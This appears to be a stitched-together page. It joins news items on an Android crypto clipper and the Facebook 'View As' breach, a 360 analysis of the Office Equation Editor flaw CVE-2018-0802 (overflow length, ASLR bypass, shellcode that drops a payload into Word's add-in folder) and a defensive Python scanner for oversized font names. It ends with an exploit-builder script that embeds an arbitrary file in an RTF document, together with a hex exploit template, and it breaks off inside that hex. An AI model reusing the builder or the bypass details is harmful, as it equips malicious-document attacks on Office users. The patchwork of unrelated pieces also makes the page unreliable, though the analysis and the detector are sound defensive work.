  1. First Android Clipboard Hijacking Crypto Malware Found On Google Play Store
     February 11, 2019, Swati Khandelwal

     A security researcher has discovered yet another cryptocurrency-stealing malware on the official Google Play Store that was designed to secretly steal bitcoin and cryptocurrency from unwitting users.

     The malware, described as a "Clipper," masqueraded as a legitimate cryptocurrency app and worked by replacing cryptocurrency wallet addresses copied into the Android clipboard with one belonging to the attackers, ESET researcher Lukas Stefanko explained in a blog post.

     Since cryptocurrency wallet addresses are made up of long strings of characters for security reasons, users usually prefer copying and pasting the wallet addresses using the clipboard over typing them out. The newly discovered clipper malware, dubbed Android/Clipper.C by ESET, took advantage of this behavior to steal users' cryptocurrency.

     To do this, the attackers first tricked users into installing a malicious app that impersonated a legitimate cryptocurrency service called MetaMask, claiming to let users run Ethereum decentralized apps in their web browsers without having to run a full Ethereum node.

     Officially, the legitimate version of MetaMask is only available as a web browser extension for Chrome, Firefox, Opera, or Brave, and has not yet launched on any mobile app store. However, Stefanko spotted the malicious MetaMask app on the Play Store targeting users who want to use a mobile version of the service, swapping their legitimate cryptocurrency wallet address for the hacker's own address via the clipboard.

     As a result, users who intended to transfer funds into a cryptocurrency wallet of their choice would instead make a deposit into the attacker's wallet address pasted by the malicious app.

     Stefanko spotted the malicious MetaMask app, which he believes was the first Android Trojan Clipper to be discovered on the Play Store, shortly after its introduction to the app store on February 1. Google took down the malicious app almost immediately after being notified by the researcher.

     While the bitcoin price has dropped steadily since hitting its all-time high in December 2017, there has been no reduction (in fact a rise) in the cryptocurrency scandals, thefts, and scams that continue to plague the industry.

     Just last week, The Hacker News reported how customers of the largest Canadian bitcoin exchange QuadrigaCX lost $145 million in cryptocurrency after the sudden death of its owner, who was the only one with access to the company's cold (offline) storage wallets. However, some users and researchers are suggesting the incident could be an exit scam.
  2. Facebook discovered it on Tuesday afternoon but did not inform its users until Friday night that the company had suffered the biggest hack in its history, in which at least 50 million accounts have been compromised. Last Tuesday, the company informed the FBI and the Irish Data Protection Commission, the body in charge of enforcing European data protection regulation, of a breach in its security systems whose origin and motive were unknown to it. Facebook took two days, until Thursday night, to fix the security problem. However, the internal investigation is still open and the company does not know whether "the accounts were misused", according to the company's CEO, Mark Zuckerberg, in a message on his social network.

     Image: the notification that users affected by the hack received in their Facebook profile.

     "On Tuesday, I assumed that an attacker had exploited a technical vulnerability to steal access to more than 50 million accounts," he said. Once it became public, Zuckerberg himself described the incident as "a very serious security issue" that "they are taking very seriously" in statements to the American media.

     According to the company, the hackers took advantage of the "View As" feature, which lets the owner of an account see what their profile looks like to a third person, to take over and control other people's accounts. In response to the attack, Facebook has chosen to reset the accounts of 90 million users around the world, who will have to re-enter their username and password to regain access. In addition to the 50 million accounts exposed by the security breach, the company has decided, as a precaution, to reset the accounts of another 40 million users who had used the "View As" function over the past year.

     A hack at the worst moment for Facebook

     This hack has come at the worst possible time for Facebook. After its last presentation of results in July, the company's shares plummeted 21% to stand at around $170. The stock market crash was precipitated by growth of 1.44% during the last quarter, a figure well below those achieved in previous years. In addition, Facebook faces a serious exodus of users in the United States. According to the latest Pew Research Center survey, 25% of users have reportedly already left this social network, a percentage that rises to 44% in the youngest age group.

     What should I do to secure my passwords?

     The most important thing to stop someone sneaking into your Facebook account is to have a very secure password. It should not include your name, predictable numbers such as birth dates, or common words or words that can easily be associated with you. If you want to create a very secure password and always remember it, here is a small guide to doing it so that nobody knows how your account is protected.

     In addition, Facebook offers the option to activate two-step verification. This extra layer of defence requires a code that is randomly generated and sent by text message to a phone number, in addition to the username and password. So even if someone knows your Instagram credentials and tries to log in from their phone or computer, they cannot get into your account unless they also have your phone and receive the SMS with the code. It is highly recommended to activate two-step verification, both on Facebook and on any other service that offers it, be it WhatsApp, Instagram, Gmail or others.
  3. Introduction

     The Microsoft security patch of January 2018 fixes the Office 0day vulnerability (CVE-2018-0802) captured by the 360 Core Security Advanced Threat Response Team. This vulnerability affects almost all versions of Office that Microsoft currently supports. It is the second outbreak of high-level threats using a zero-day since 360's first global interception of the Office 0day CVE-2017-11826. The 360 core security team has been actively communicating with Microsoft and working together to get the 0day fixed, so that the vulnerability could be properly resolved before disclosure of the vulnerability information. The technical principle of the vulnerability is similar to the 2017 "Nightmare Formula" vulnerability (CVE-2017-11882): it is another attack on EQNEDT32.EXE, the Equation Editor component embedded in Office. We call it "Nightmare Formula II" (CVE-2018-0802).

     Attack process analysis

     We captured several in-the-wild attacks using "Nightmare Formula II". The in-the-wild samples embed two formula objects, one using the Nday vulnerability and one using the 0day. The Nday exploit attacks unpatched systems, while the 0day exploit attacks fully patched systems and bypasses the ASLR (address randomization) protection added by the CVE-2017-11882 patch. Either way, the attack eventually implants a malicious remote-control program on the user's computer.

     Figure: "Nightmare Formula II" in-the-wild sample attack process

     Vulnerability analysis

     "Nightmare Formula II" is a patch-bypass vulnerability for CVE-2017-11882 of type stack overflow. The root cause is that Microsoft's patch for "Nightmare Formula" did not fix the stack overflow in the copy of the font FaceName. This vulnerability only causes a crash on an unpatched version, but it can be exploited reliably on a patched version. Below we analyze CVE-2018-0802 using PoC samples.

     Static analysis

     As with CVE-2017-11882, the trigger data for this vulnerability lies within the "Equation Native" stream of the extracted OLE object. The red-boxed portion in Figure 1 is the core data, 0x99 = 153 bytes in total. 0x08 is the font tag, the following 00 01 are the typeface and style of the font, and the area from 33 to 25 00 is the name of the font, which is the data copied when the stack overflows. This part of the data contains the shellcode, the ASLR bypass trick, the process command line, and padding; we analyze them later.

     Figure 1: Equation Native data structure

     According to information published online, the entire "Equation Native" data structure is: MTEFData = MTEF header + MTEF byte stream. The structure of EQNOLEFILEHDR is shown in Figure 2.

     Figure 2

     The structure of the MTEF header is shown in Table 1. For this structure there are differences between the actual data and the format specification; the table shows what we actually observed.

     Offset | Description                      | Value
     0      | MTEF version number              | 0x03
     1      | Platform that generated the data | 0x00 Macintosh, 0x01 Windows
     2      | Product that generated the data  | 0x00 MathType, 0x01 Equation Editor
     3      | Product major version number     | 0x03
     4      | Product minor version number     | 0x0A

     Table 1

     In the attack sample, the MTEF byte stream has the structure shown in Table 2:

     Initial SIZE record | FONT record | FONT content | Remaining data

     Table 2

     The FONT record and FONT content structure are shown in Table 3:

     Member | Description     | Note
     Tag    | 0x08            | 1 byte
     Tface  | Typeface number | 1 byte
     Style  | Font style      | 1 byte
     Name   | Font name       | NULL-terminated ASCII string

     Table 3

     Patch bypass analysis

     The CVE-2018-0802 trigger point is in sub_21E39 (module base set to 0 in IDA), shown in Figure 3. The function's purpose is to initialize a LOGFONT structure from the font data in the formula.

     Figure 3

     Let's look at Microsoft's description of the LOGFONT structure (Figure 4). The last member of this structure is lfFaceName.

     Figure 4: LOGFONT structure

     Now Microsoft's description of the lfFaceName member (Figure 5): lfFaceName is the typeface name of the font. In the version being analyzed it is a null-terminated char string with a maximum length of 32, including the terminating NULL.

     Figure 5

     The problem is obvious: the code in the red box in Figure 3 does not limit the copy length when copying the font FaceName. The source of the copy is the user-supplied font name and the destination is the address of a LOGFONT structure passed in from the parent function. Looking back at the parent function of sub_21E39 (Figure 6), this address is on the stack frame opened by the parent function; it is a local variable of the parent. The attacker constructs malicious data that overwrites the low two bytes of the parent function's (sub_21774's) return address and thus redirects control flow to the shellcode on the stack.

     Figure 6

     During the analysis we found what looked like recursion. Figure 7 shows the disassembly of sub_21774: it first calls the vulnerable function sub_21E39 to initialize a LOGFONT structure, then passes the structure to the relevant API, which returns the font name the system resolved, saved in Name. It then compares the obtained Name with the user-supplied lpLogFont. If they differ (and sub_115A7 returns False), it decides whether to call itself again according to the condition a3, where a3 is the third parameter of the sub_21E39 function.

     Figure 7

     We need to look at this third parameter, otherwise there may be multiple recursions and the overflow cannot be used effectively. From the earlier CVE-2017-11882 debugging results (Figure 8), when parsing user-supplied font data the function that calls sub_21774 is sub_214C6. Looking back at sub_214C6 (Figure 9), it passes 1 as the third parameter of sub_21774, so if(a3) in Figure 7 is true. When sub_21774 recursively calls itself (Figure 7), the value passed as the third parameter is 0, so sub_21774 will not call itself again and the recursion is only one level deep. That settles the recursion question.

     Figure 8: CVE-2017-11882 triggered execution flow

     Figure 9

     One more problem: if the _strcmpi(lpLogfont, &Name) check does not hold (and with user-forged font data it certainly does not), sub_115A7 is called, which means execution reaches the CVE-2017-11882 overflow point. On a version without the November patch, a successful CVE-2017-11882 exploit never overflows at the CVE-2018-0802 point, because the former needs a much smaller overflow than the latter and the copy is NUL-terminated (controlling EIP through the CVE-2017-11882 overflow takes only 0x2C bytes, while, as the analysis of Figure 11 below shows, controlling EIP through the CVE-2018-0802 overflow takes 0x94 bytes). Conversely, trying to trigger CVE-2018-0802 on a version without the November patch triggers CVE-2017-11882 first. In short, CVE-2018-0802 is not exploitable before the November patch. However, as Figure 10 shows, in the November patch Microsoft limited the copy length to 0x20 before the CVE-2017-11882 overflow point and manually appended a NULL after the copy, which neutralizes CVE-2017-11882. This is exactly what makes CVE-2018-0802, unusable before the patch, exploitable afterwards. Now, as long as sub_115A7 returns False, the vulnerability can be exploited reliably, and live debugging confirms that sub_115A7 does return False.

     Figure 10

     Dynamic analysis

     Overflow data copy

     With the above analysis, dynamic analysis becomes very simple. Since this overflow point copies data, let's monitor the source string and the corresponding stack trace for each copy. We first enter the OLE data Load function (sub_6881), then break before the data copy and dump the output; the result is shown in the log. From the log there are two copies, and the stack traces show that these are the two calls to sub_21774 identified in the static analysis: the first is sub_214C6 calling sub_21774, the second is sub_21774 calling itself. Clearly the stack overflow occurs on the first copy. Incidentally, the bytes cb ce cc e5 are the GBK encoding of 宋体 (SimSun).

     Let us calculate exactly how long the overflow must be to control the return address of the parent function (sub_21774); the conclusion was already mentioned in the "Patch bypass analysis" section. From Figure 11, going from lfFaceName (at -0x90) to ret_addr (at +0x4) requires 0x94 bytes in total. Bytes beyond the first 0x94 overwrite the return address byte by byte, starting from the low byte.

     Figure 11

     Look at the data in the PoC (Figure 12): the blue part is the first 0x94 bytes of the overflow, 25 00 is the last two bytes of the overflow, and 00 is the terminator; the copy stops when it meets 00. Given the little-endian layout, when the PoC runs only the low 2 bytes of EIP are overwritten. Why do it this way? The answer is to bypass ASLR.

     Figure 12

     Bypass ASLR

     Let's see why overwriting only two bytes can bypass ASLR. First, the patched file has ASLR enabled, as shown in Figure 13. As a result, the base address at which EQNEDT32.EXE is loaded is random each time, so the first problem to consider when overflowing is how to bypass ASLR. (As for DEP, Figure 14 shows that DEP is not enabled for EQNEDT32.EXE in the patched file, so DEP normally need not be considered.) Unfortunately, the attackers clearly understand the Windows system mechanisms and defenses. On the Windows platform, ASLR for a 32-bit process only randomizes the upper 2 bytes of the address each time, while the lower 2 bytes remain unchanged. If a ret instruction can be found at an address whose low 16 bits match the overwritten bytes, that is, at an address of the form 0xABCD00XY (where ABCD and XY are arbitrary hex digits; the second-to-last byte must be 0x00 because the copy has to be truncated precisely), this ret can be used directly to jump to the stack. Since there is no need to bypass DEP, the shellcode can execute directly on the stack.

     Figure 13: ASLR status of EQNEDT32.EXE is Enabled, DEP is Non-Permanent DEP

     Figure 14: DEP status of EQNEDT32.EXE is Disabled

     More unfortunately, within the EQNEDT32.EXE module Microsoft provided exactly one such address (Figure 15): 20025. The two bytes written over EIP, 25 00, are therefore the only possible choice; there is no second ret that satisfies the condition.

     Figure 15

     Consider what the original return address of sub_21774 is: of course, the address of the instruction in sub_214C6 following the call to sub_21774. Figure 16 shows that the offset of this address is 214E2. After the overwrite shown in Figure 12, the offset becomes 20025, consistent with the analysis above, and Figure 17 shows that this address holds a ret instruction. This ret pops the first argument that sub_214C6 pushed for sub_21774 and transfers control to it. To make matters worse, this first argument happens to be lpLogFont, the FontName provided by the user. So once the ret executes, control flow moves to the stack and begins executing the first byte of the user-supplied FontName.

     Figure 16

     Figure 17

     Sample A shellcode analysis

     In the PoC derived from sample A, the control-flow hijack and the execution of the shellcode are shown in Figure 18.

     Figure 18

     Because of the recursion, execution has to return from sub_21774 twice, which explains the first two ret instructions. Immediately after the jmp eax instruction, WinExec is called, and the command-line parameter happens to be calc.exe, as shown in Figure 19.

     Figure 19

     Sample B shellcode analysis

     Sample B bypasses ASLR in the same way as sample A, but its shellcode differs. Sample B's shellcode locates the kernel32.dll export table through the PEB (Figures 20 and 21), then searches the export table for the desired functions by hash, using a specific hash algorithm (Figure 21); the hash values are given in the shellcode. The shellcode then saves each found function address where its hash value was previously stored (Figure 22).

     Figure 20: Hash values and copy path name given in sample B's shellcode

     Figure 21: Finding the required function in the export table of kernel32.dll by hash value

     Figure 22: Comparison of data on the stack before and after the function addresses are found

     After finding the functions and saving their addresses on the stack, it first calls ExpandEnvironmentStringsA to expand the short path (stored in the shellcode), then calls CopyFileA to copy the payload into the Word add-in directory so that the payload is loaded into memory automatically the next time Word starts. Finally it calls ExitProcess to exit the Equation Editor process (Figure 23). The whole process does not affect the normal opening of the document.

     Figure 23: Expand the short path, copy the file, and exit the process

     Summary

     The 0day CVE-2018-0802 used in these attacks can be called the twin of CVE-2017-11882. The attack samples embed two OLE objects and use both at once: one targets unpatched systems, the other patched ones. The hackers' well-constructed attack covers both patch states of the vulnerable system. Exploitation of this vulnerability and its ASLR bypass rest on a degree of coincidence: had there been no usable ret instruction in the EQNEDT32.EXE module to bypass ASLR, had lpLogFont not been the first parameter of sub_21774, or had the CVE-2017-11882 patch enforced DEP, "Nightmare Formula II" would have had no chance. The latest 360 security products already detect and block this zero-day, and we recommend that users install the Microsoft security patch for January 2018.
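The static analysis above lays out the MTEF header (Table 1) and the FONT record layout (Table 3), and the patch bypass analysis gives the limit the copy violates: lfFaceName holds at most 32 characters including the NUL. A defender can turn those two facts into a static check on the extracted "Equation Native" stream. The following Python is an added detection example written for this page, not code from the 360 write-up or from the PoC below: it walks a raw MTEF byte stream, pulls out every FONT record, and flags any whose name would not fit in lfFaceName. The single-byte size record tags 0x0A-0x0E and the scanner's bail-out on unknown records are assumptions taken from the MTEF v3 format rather than from the page, the sample streams are constructed, and extracting the stream from the OLE container (for example with the olefile module) is assumed to have been done already.

```python
"""Scan a raw MTEF v3 byte stream (the content of an OLE "Equation Native"
stream) for FONT records whose name would overflow LOGFONT.lfFaceName.

Added detection example, not code from the 360 analysis. The header layout
and FONT record layout follow Tables 1 and 3 of the write-up; the single-byte
size record tags 0x0A-0x0E are an assumption from the MTEF v3 format reference,
not something the page states. Extraction of the stream from the OLE container
(e.g. with the olefile module) is assumed to have happened before this runs.
"""
from dataclasses import dataclass
from typing import Dict, List

LFFACENAME_LEN = 32            # LF_FACESIZE: 32 chars including the NUL terminator
MAX_SAFE_NAME = LFFACENAME_LEN - 1

MTEF_HEADER_LEN = 5            # version, platform, product, major, minor (Table 1)
TAG_END = 0x00
TAG_FONT = 0x08                # FONT record tag (Table 3)
SIZE_TAGS = range(0x0A, 0x0F)  # FULL, SUB, SUB2, SYM, SUBSYM: one byte each (assumption)


@dataclass
class FontRecord:
    offset: int
    tface: int
    style: int
    name: bytes

    @property
    def overflows(self) -> bool:
        # The name plus its NUL must fit in lfFaceName[32].
        return len(self.name) + 1 > LFFACENAME_LEN


def parse_header(stream: bytes) -> Dict[str, int]:
    """Decode the five-byte MTEF header described in Table 1."""
    if len(stream) < MTEF_HEADER_LEN:
        raise ValueError("stream shorter than MTEF header")
    version, platform, product, major, minor = stream[:MTEF_HEADER_LEN]
    return {"version": version, "platform": platform, "product": product,
            "major": major, "minor": minor}


def parse_font_records(stream: bytes) -> List[FontRecord]:
    """Walk the byte stream and return every FONT record found.

    Walking stops at the first record type this scanner does not understand;
    records found before that point are still returned.
    """
    records: List[FontRecord] = []
    i = MTEF_HEADER_LEN
    while i < len(stream):
        tag = stream[i]
        if tag == TAG_END:
            break
        if tag in SIZE_TAGS:
            i += 1
            continue
        if tag != TAG_FONT:
            break  # unknown record: bail out rather than misparse
        if i + 3 > len(stream):
            break
        tface, style = stream[i + 1], stream[i + 2]
        name_start = i + 3
        nul = stream.find(b"\x00", name_start)
        if nul == -1:
            nul = len(stream)  # unterminated name: the copy would run to the end of the data
        records.append(FontRecord(i, tface, style, stream[name_start:nul]))
        i = nul + 1
    return records


def scan(stream: bytes) -> List[str]:
    """Return one finding per suspicious FONT record (empty list if clean)."""
    findings = []
    for rec in parse_font_records(stream):
        if rec.overflows:
            findings.append(
                f"FONT record at offset {rec.offset:#x}: name is {len(rec.name)} bytes, "
                f"exceeds lfFaceName limit of {MAX_SAFE_NAME} "
                f"(tface={rec.tface}, style={rec.style})")
    return findings


def make_stream(font_name: bytes) -> bytes:
    """Build a constructed MTEF stream: header, FULL size record, one FONT record."""
    header = bytes([0x03, 0x01, 0x00, 0x03, 0x0A])  # v3, Windows, MathType, 3.10
    return header + bytes([0x0A, TAG_FONT, 0x00, 0x01]) + font_name + b"\x00"


# Constructed samples: an ordinary font name, and a name long enough to reach
# the saved return address (the write-up gives 0x94 bytes for that).
BENIGN_STREAM = make_stream(b"Times New Roman")
OVERSIZED_STREAM = make_stream(b"A" * 0x96)

if __name__ == "__main__":
    for label, s in (("benign", BENIGN_STREAM), ("oversized", OVERSIZED_STREAM)):
        print(label, parse_header(s), scan(s) or "clean")
```

Running the block prints a clean verdict for the constructed benign stream and one finding for the oversized one. The threshold is the 32-byte LF_FACESIZE rather than the 0x2C or 0x94 bytes the two exploits need: any font name that cannot fit the structure is already malformed and worth a look, whichever of the two overflow points it would reach.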
reference [Hidden Content] Code .py import argparse import os import struct class Package(object): """ Packager spec based on: [Hidden Content] Dropping method by Haifei Li: [Hidden Content] Found being used itw by @MalwareParty: [Hidden Content] """ def __init__(self, filename): self.filename = os.path.basename(filename) self.fakepath = 'C:\\fakepath\\{}'.format(self.filename) self.orgpath = self.fakepath self.datapath = self.fakepath with open(filename,'rb') as f: self.data = f.read() self.OBJ_HEAD = r"{\object\objemb\objw1\objh1{\*\objclass Package}{\*\objdata " self.OBJ_TAIL = r"0105000000000000}}" def get_object_header(self): OLEVersion = '01050000' FormatID = '02000000' ClassName = 'Package' szClassName = struct.pack("<I", len(ClassName) + 1).encode('hex') szPackageData = struct.pack("<I", len(self.get_package_data())/2).encode('hex') return ''.join([ OLEVersion, FormatID, szClassName, ClassName.encode('hex') + '00', '00000000', '00000000', szPackageData, ]) def get_package_data(self): StreamHeader = '0200' Label = self.filename.encode('hex') + '00' OrgPath = self.orgpath.encode('hex') + '00' UType = '00000300' DataPath = self.datapath.encode('hex') + '00' DataPathLen = struct.pack("<I", len(self.datapath)+1).encode('hex') DataLen = struct.pack("<I", len(self.data)).encode('hex') Data = self.data.encode('hex') OrgPathWLen = struct.pack("<I", len(self.datapath)).encode('hex') OrgPathW = self.datapath.encode('utf-16le').encode('hex') LabelLen = struct.pack("<I", len(self.filename)).encode('hex') LabelW = self.filename.encode('utf-16le').encode('hex') DefPathWLen = struct.pack("<I", len(self.orgpath)).encode('hex') DefPathW = self.orgpath.encode('utf-16le').encode('hex') return ''.join([ StreamHeader, Label, OrgPath, UType, DataPathLen, DataPath, DataLen, Data, OrgPathWLen, OrgPathW, LabelLen, LabelW, DefPathWLen, DefPathW, ]) def build_package(self): return self.OBJ_HEAD + self.get_object_header() + self.get_package_data() + self.OBJ_TAIL RTF_HEADER = 
R"""{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Calibri;}} {\*\generator Riched20 6.3.9600}\viewkind4\uc1 \pard\sa200\sl276\slmult1\f0\fs22\lang9""" RTF_TRAILER = R"""\par} """ OBJECT_HEADER = R"""{\object\objemb\objupdate{\*\objclass Equation.3}\objw380\objh260{\*\objdata """ OBJECT_TRAILER = R""" }{\result{\pict{\*\picprop}\wmetafile8\picw380\pich260\picwgoal380\pichgoal260 0100090000039e00000002001c0000000000050000000902000000000500000002010100000005 0000000102ffffff00050000002e0118000000050000000b0200000000050000000c02a0016002 1200000026060f001a00ffffffff000010000000c0ffffffc6ffffff20020000660100000b0000 0026060f000c004d61746854797065000020001c000000fb0280fe000000000000900100000000 0402001054696d6573204e657720526f6d616e00feffffff5f2d0a6500000a0000000000040000 002d01000009000000320a6001100003000000313131000a00000026060f000a00ffffffff0100 000000001c000000fb021000070000000000bc02000000000102022253797374656d000048008a 0100000a000600000048008a01ffffffff6ce21800040000002d01010004000000f00100000300 00000000 }}} """ OBJDATA_TEMPLATE_0802 = R""" 01050000020000000B0000004571756174696F6E2E33000000000000000000000E0000D0CF11E0A1 B11AE1000000000000000000000000000000003E000300FEFF090006000000000000000000000001 0000000100000000000000001000000200000001000000FEFFFFFF0000000000000000FFFFFFFFFF FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF 
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFDFFFFFF04000000FEFFFFFF05 000000FEFFFFFFFEFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF52006F006F007400200045006E0074007200790000 00000000000000000000000000000000000000000000000000000000000000000000000000000000 00000016000500FFFFFFFFFFFFFFFF0200000002CE020000000000C0000000000000460000000000 00000000000000B024837CC473D30103000000C00300000000000001004F006C0065000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000A000201FFFFFFFFFFFFFFFFFFFFFFFF00000000000000000000000000 0000000000000000000000000000000000000000000000000000001400000000000000010043006F 006D0070004F0062006A000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000120002010100000004000000FFFFFFFF0000000000 
00000000000000000000000000000000000000000000000000000000000000010000006600000000 00000003004F0062006A0049006E0066006F00000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000012000201FFFFFFFFFFFFFFFFFF FFFFFF00000000000000000000000000000000000000000000000000000000000000000000000003 0000000600000000000000FEFFFFFF02000000FEFFFFFFFEFFFFFF05000000060000000700000008 00000009000000FEFFFFFFFEFFFFFF0C0000000D0000000E000000FEFFFFFFFFFFFFFFFFFFFFFFFF FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF FFFFFF01000002000000000000000000000000000000000000000000000000000000000000000000 0000000000000000000000000000000000000000000000000000000100FEFF030A0000FFFFFFFF02 CE020000000000C000000000000046170000004D6963726F736F6674204571756174696F6E20332E 30000C0000004453204571756174696F6E000B0000004571756174696F6E2E3300F439B271000000 00000000000000000000000000000000000000000000000000000000000000000000000000030004 00000000000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000FFFFFFFF030000000400000001000000FFFFFFFF01 
000000000000007C010000040100003C0100000100090000039E00000002001C0000000000050000 0009020000000005000000020101000000050000000102FFFFFF00050000002E0118000000050000 000B0200000000050000000C02A00160021200000026060F001A00FFFFFFFF000010000000C0FFFF FFC6FFFFFF20020000660100000B00000026060F000C004D61746854797065000020001C000000FB 0280FE0000000000009001000000000402001054696D6573204E657720526F6D616E00FEFFFFFF5F 2D0A6500000A0000000000040000002D01000009000000320A6001100003000000202002004F006C 00650050007200650073003000300030000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000180002000300000005000000FFFFFFFF0000000000 00000000000000000000000000000000000000000000000000000000000000040000007E01000000 0000005200690063006800450064006900740046006C006100670073000000000000000000000000 0000000000000000000000000000000000000000000000000000001C000201FFFFFFFF06000000FF FFFFFF0000000000000000000000000000000000000000000000000000000000000000000000000A 0000000C000000000000004500710075006100740069006F006E0020004E00610074006900760065 000000000000000000000000000000000000000000000000000000000000000000000020000200FF FFFFFFFFFFFFFFFFFFFFFF0000000000000000000000000000000000000000000000000000000000 000000000000000B000000C500000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000FFFFFFFFFFFFFFFFFFFFFFFF000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000020000A00000026060F000A00FF FFFFFF0100000000001C000000FB021000070000000000BC02000000000102022253797374656D00 0048008A0100000A000600000048008A01FFFFFFFF6CE21800040000002D01010004000000F00100 000300000000000000000000000000000000000000000000004E414E490000000000000100000000 00000001000000000000000000000000000000000000000000000000000000000000000000000000 000000000000000000000000000000000000001C00000002009EC4A900000000000000C8A75C00C4 
